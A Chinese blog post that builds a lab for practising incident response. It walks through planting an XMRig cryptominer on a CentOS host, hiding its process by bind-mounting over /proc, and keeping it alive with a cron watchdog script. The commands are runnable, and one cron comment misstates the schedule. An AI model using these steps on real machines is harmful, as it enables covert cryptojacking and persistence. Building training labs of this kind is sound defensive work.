赞
踩
自己在应急响应这方面的知识,可以说是很薄弱,几乎为0。最近打算入手学习一下应急响应,看了好久的文档,想着实战一下检验自己的学习成果,不过是本人的资源有限,也没找到啥好的靶场,所以就想着自己搭建一个。但是由于本人实力有限,也只懂得皮毛。大家不要嘲笑,也多请各位大佬多多指教!!
现在我们模拟一下攻击者,假设现在我们已经通过漏洞getshell或者rec了
受害主机:centos7
先查看一下权限,root权限
然后就是把病毒传上来
挖矿病毒的运行程序我放在的根目录下,在攻击机启动一个web服务
python3 -m http.server 9999
然后我们在受害主机上用wget
命令下载
创建一个隐藏目录,并然后解压到新目录
tar -zxvf xxx
cd
到我们挖矿程序的目录,然后给他权限,运行
chmod +x xmrig
此时我们可以看到cpu爆满,这样就是运行成功了。
此时我们在ps里是可以看到他的信息
ps -aux | grep pid号
这样的话防守人员或者说运维人员,很容易发现他,当他们看到cpu爆红之后开始排查,就很容易排查到我们,我们需要给他隐藏起来
无法通过ps、top等命令进行查询,可能是因为攻击者将/proc/pid进行了隐藏,可以通过一下方式进行(ubuntu测试成功,centos测试失败)
- makdir .hidder
- sudo mount -o bind .hidder /proc/3514
这种情况可以使用cat /proc/$$/mountinfo
这样整一个目录挂在,就无法通过 ps、top等命令进行查询
添加计划任务,作用就是如果他的进程被杀掉了,可以再次启动
第一步就是先创建一个shell脚本,写如一下内容
#!/bin/bash
if ! pgrep -x "xmrig"
then
nohup /tmp/.k/xmrig &
fi
赋予他执行的权限
sudo chmod +x /tmp/.k/xmrig.sh
设置计划任务,定期执行监控脚本。你可以使用Cron来设置计划任务,让监控脚本每隔一段时间执行一次。
执行以下命令以编辑Cron表:
crontab -e
在打开的文件中,添加以下行来设置计划任务:
* * * * * sleep 10; /tmp/.k/xmrig.sh #每10s执行一次
crontab -e
在打开的文件中,添加以下行来设置计划任务:
* * * * * sleep 10; /tmp/.k/xmrig.sh #每10s执行一次
橙色少年 ,后台发送 " 挖矿病毒样本 " 即可!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。